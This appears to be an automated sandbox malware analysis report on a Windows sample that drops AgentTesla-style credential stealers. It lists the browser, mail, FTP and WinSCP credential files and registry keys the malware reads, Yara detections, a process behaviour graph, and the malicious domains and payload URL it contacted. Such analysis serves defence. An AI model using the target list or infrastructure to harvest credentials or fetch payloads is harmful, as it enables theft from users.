Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Yara detected Credential Stealer
Source: Yara match File source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2164, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562866 Sample: 2jbMIxCFsK.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 93 s82.gocheapweb.com 2->93 95 pywolwnvd.biz 2->95 97 2 other IPs or domains 2->97 131 Found malware configuration 2->131 133 Malicious sample detected (through community Yara rule) 2->133 135 Antivirus detection for dropped file 2->135 137 13 other signatures 2->137 10 2jbMIxCFsK.exe 1 7 2->10         started        15 Wisrysxl.PIF 2->15         started        17 Wisrysxl.PIF 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 103 gxe0.com 198.252.105.91, 443, 49704, 49705 HAWKHOSTCA Canada 10->103 87 C:\Users\Public\Libraries\lxsyrsiW.pif, PE32 10->87 dropped 89 C:\Users\Public\Wisrysxl.url, MS 10->89 dropped 91 C:\Users\Public\Libraries\Wisrysxl, data 10->91 dropped 151 Drops PE files with a suspicious file extension 10->151 153 Writes to foreign memory regions 10->153 155 Allocates memory in foreign processes 10->155 157 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->157 21 lxsyrsiW.pif 4 10->21         started        25 cmd.exe 1 10->25         started        27 esentutl.exe 2 10->27         started        159 Antivirus detection for dropped file 15->159 161 Multi AV Scanner detection for dropped file 15->161 163 Machine Learning detection for dropped file 15->163 29 lxsyrsiW.pif 15->29         started        165 Sample uses process hollowing technique 17->165 167 Allocates many large memory junks 17->167 31 lxsyrsiW.pif 17->31         started        file6 signatures7 process8 file9 79 C:\Users\user\AppData\...\server_BTC.exe, PE32 21->79 dropped 81 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 21->81 dropped 83 C:\Program Files (x86)\...\armsvc.exe, PE32 21->83 dropped 139 Drops executable to a common third party application directory 21->139 141 Infects executable files (exe, dll, sys, html) 21->141 33 server_BTC.exe 7 21->33         started        37 neworigin.exe 15 2 21->37         started        40 esentutl.exe 2 25->40         started        52 2 other processes 25->52 85 C:\Users\Public\Libraries\Wisrysxl.PIF, PE32 27->85 dropped 42 conhost.exe 27->42         started        44 neworigin.exe 29->44         started        46 server_BTC.exe 29->46         started        48 neworigin.exe 31->48         started        50 server_BTC.exe 31->50         started        signatures10 process11 dnsIp12 73 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 33->73 dropped 105 Antivirus detection for dropped file 33->105 107 Multi AV Scanner detection for dropped file 33->107 109 Machine Learning detection for dropped file 33->109 127 2 other signatures 33->127 54 TrojanAIbot.exe 33->54         started        57 powershell.exe 33->57         started        59 cmd.exe 33->59         started        61 schtasks.exe 33->61         started        99 s82.gocheapweb.com 51.195.88.199, 49707, 49724, 49742 OVHFR France 37->99 101 api.ipify.org 104.26.13.205, 443, 49706, 49736 CLOUDFLARENETUS United States 37->101 111 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 37->111 113 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->113 115 Tries to steal Mail credentials (via file / registry access) 37->115 117 Contains functionality to register a low level keyboard hook 37->117 75 C:\Users\Public\alpha.pif, PE32 40->75 dropped 119 Drops PE files to the user root directory 40->119 121 Drops PE files with a suspicious file extension 40->121 123 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 40->123 125 Tries to harvest and steal ftp login credentials 48->125 129 2 other signatures 48->129 77 C:\Users\Public\xpha.pif, PE32 52->77 dropped file13 signatures14 process15 signatures16 143 Antivirus detection for dropped file 54->143 145 Multi AV Scanner detection for dropped file 54->145 147 Machine Learning detection for dropped file 54->147 149 Loading BitLocker PowerShell Module 57->149 63 conhost.exe 57->63         started        65 WmiPrvSE.exe 57->65         started        67 conhost.exe 59->67         started        69 timeout.exe 59->69         started        71 conhost.exe 61->71         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.252.105.91
 gxe0.com Canada
20068 HAWKHOSTCA false
104.26.13.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false
51.195.88.199
 s82.gocheapweb.com France
16276 OVHFR false

Contacted Domains

Name IP Active
gxe0.com 198.252.105.91 true
pywolwnvd.biz 54.244.188.177 true
api.ipify.org 104.26.13.205 true
s82.gocheapweb.com 51.195.88.199 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    https://gxe0.com/yak/233_Wisrysxlfss true
    • Avira URL Cloud: safe
    		 unknown